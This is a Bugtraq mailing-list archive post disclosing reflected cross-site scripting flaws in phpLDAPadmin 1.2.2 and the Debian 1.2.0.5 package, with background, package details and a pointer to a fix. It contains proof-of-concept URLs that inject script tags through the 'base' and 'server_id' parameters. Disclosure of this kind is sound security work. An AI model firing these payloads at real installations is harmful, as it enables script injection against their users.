Home page logo
  • Nmap Security Scanner
  • Security Lists
  • Security Tools
  • Site News
  • Advertising
  • About/Contact
  • Sponsors:





/

bugtraq logo Bugtraq mailing list archives

XSS phpLDAPadmin: 1.2.0.5 (Debian package) and 1.2.2 (sourceforge)
From: andsarmiento () gmail com
Date: Tue, 31 Jan 2012 18:54:35 GMT
Attach some PoC analysis related to a XSS vulnerability to phpldapadmin. I previously coordinate with the Cert-US in 
order they contact with Sourceforge and Debian, but receive they was unable to put in contact with them.

The first discover was on January 10 for 1.1.6 version, where after noticed that the same vulnerability was discover 
previously. For that reason I tested later for version 1.2.2 (sourceforge) and 1.2.0.5 (Debian package).
More reference: see the files attached

On January 24 I contacted to sourceforge and appear they fix the package but still persistence on debian packages.

Fix from sourceforge:
https://sourceforge.net/tracker/index.php?func=detail&aid=3477910&group_id=61828&atid=498546




Background:
===========
phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multilanguage administration for your 
LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer 
your LDAP directory. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server 
easily manageable from any location.


Details:
========

1.- Version 1.2.2 from Sourceforge 
package:http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin-php5/1.2.2/phpldapadmin-1.2.2.tgz/download

Exploitables URI's: 
http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=?&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search

PoC:
http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search

Exploitable variable: base

Results: XSS passing through "base" variable.

2.- Version 1.2.0.5 from debian (testing and unstable repositories)
Package:
Version: 1.2.0.5-2
Depends: apache2 | httpd, php5-ldap, libapache2-mod-php5 | libapache-mod-php5 | php5-cgi | php5, ucf (>= 0.28), debconf 
(>= 0.5) | debconf-2.0
Filename: pool/main/p/phpldapadmin/phpldapadmin_1.2.0.5-2_all.deb
Size: 1276080
MD5sum: 3b4058f7fc74ff95f8223bf92bb99ec7
SHA1: 2594603f2346de814195bc6aba5e97a4febb17fb
SHA256: 4e1be7218c8030f1f17c5cd4c4f4fdb69cf5315d3e4b22bb2b4cabd7cfb93d57

PoC:

https://x.x.x.x/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>
https://x.x.x.x/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false

Exploitable Variable: server_id

Results: XSS passing through "server_id" variable.

Impact: Remote attackers might be able to perform Cross-Site Scripting (XSS) attacks by various vectors.

Thanks in advance for your comments
Kind Regards

  By Date           By Thread  

Current thread:
  • XSS phpLDAPadmin: 1.2.0.5 (Debian package) and 1.2.2 (sourceforge) andsarmiento (Feb 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]